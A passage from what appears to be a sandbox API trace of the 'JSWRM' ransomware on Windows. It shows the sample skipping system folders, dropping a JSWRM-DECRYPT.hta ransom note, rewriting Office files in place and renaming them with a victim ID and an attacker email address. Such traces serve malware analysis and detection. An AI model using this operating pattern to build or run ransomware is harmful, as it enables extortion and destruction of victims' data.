ftLastAccessTime.dwLowDateTime=0xfac96d8c, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xfac96d8c, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2=".") returned 1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="..") returned 1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="...") returned 1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="windows") returned -1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="recovery") returned -1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="perflogs") returned -1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="documents and settings") returned 1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="$RECYCLE.BIN") returned 1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="system volume information") returned -1 [0071.818] lstrcmpiW (lpString1="Microsoft Office", lpString2="msocache") returned -1 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225fb0 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0071.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\jswrm-decrypt.hta")) returned 0xffffffff [0071.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225fb0 | out: hHeap=0x1e0000) returned 1 [0071.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0071.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24a1c0 [0071.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0071.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24bf90 [0071.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24a1c0 | out: hHeap=0x1e0000) returned 1 [0071.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0071.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0071.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0071.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0071.820] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.820] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0071.821] CloseHandle (hObject=0x450) returned 1 [0071.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0071.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf90 | out: hHeap=0x1e0000) returned 1 [0071.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0071.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0071.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0071.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0071.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0071.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0071.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0071.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\jswrm-decrypt.hta")) returned 0x20 [0071.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0071.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0071.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0071.822] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfac96d8c, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0x2178396a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e40 [0071.822] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.822] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfac96d8c, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0x2178396a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.822] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.822] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.822] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d6778e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9dfb986, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf9e9425d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x5ab2f7, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="AppXManifest.xml", cAlternateFileName="APPXMA~1.XML")) returned 1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2=".") returned 1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="..") returned 1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="...") returned 1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="windows") returned -1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="recovery") returned -1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="perflogs") returned -1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="documents and settings") returned -1 [0071.822] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0071.823] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="system volume information") returned -1 [0071.823] lstrcmpiW (lpString1="AppXManifest.xml", lpString2="msocache") returned -1 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.xml", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0071.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.xml", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.xml", lpUsedDefaultChar=0x0) returned 16 [0071.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.xml", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0071.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.xml", cchWideChar=16, lpMultiByteStr=0x241218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.xml", lpUsedDefaultChar=0x0) returned 16 [0071.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0071.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0071.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0071.823] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=5944055) returned 1 [0071.823] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0071.823] ReadFile (in: hFile=0x3d4, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345f2d4*=0x27100, lpOverlapped=0x0) returned 1 [0071.836] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.836] WriteFile (in: hFile=0x3d4, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345f2d0*=0x27100, lpOverlapped=0x0) returned 1 [0071.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0071.837] CloseHandle (hObject=0x3d4) returned 1 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0071.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0071.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0071.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0071.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0071.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0071.838] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83543a09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x119, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="FileSystemMetadata.xml", cAlternateFileName="FILESY~1.XML")) returned 1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2=".") returned 1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="..") returned 1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="...") returned 1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="windows") returned -1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="recovery") returned -1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="perflogs") returned -1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="documents and settings") returned 1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="$RECYCLE.BIN") returned 1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="system volume information") returned -1 [0071.838] lstrcmpiW (lpString1="FileSystemMetadata.xml", lpString2="msocache") returned -1 [0071.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FileSystemMetadata.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0071.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0071.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FileSystemMetadata.xml", cchWideChar=22, lpMultiByteStr=0x240f20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileSystemMetadata.xml", lpUsedDefaultChar=0x0) returned 22 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FileSystemMetadata.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0071.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0071.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FileSystemMetadata.xml", cchWideChar=22, lpMultiByteStr=0x240fe8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileSystemMetadata.xml", lpUsedDefaultChar=0x0) returned 22 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0071.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0071.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0071.839] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=281) returned 1 [0071.839] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0071.839] ReadFile (in: hFile=0x3d4, lpBuffer=0x23e110, nNumberOfBytesToRead=0x110, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23e110*, lpNumberOfBytesRead=0x345f2d4*=0x110, lpOverlapped=0x0) returned 1 [0071.840] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.840] WriteFile (in: hFile=0x3d4, lpBuffer=0x23e110*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23e110*, lpNumberOfBytesWritten=0x345f2d0*=0x110, lpOverlapped=0x0) returned 1 [0071.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0071.840] CloseHandle (hObject=0x3d4) returned 1 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0071.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0071.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0071.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.841] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0071.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0071.841] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2178396a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2178396a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2178396a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0071.841] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0071.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 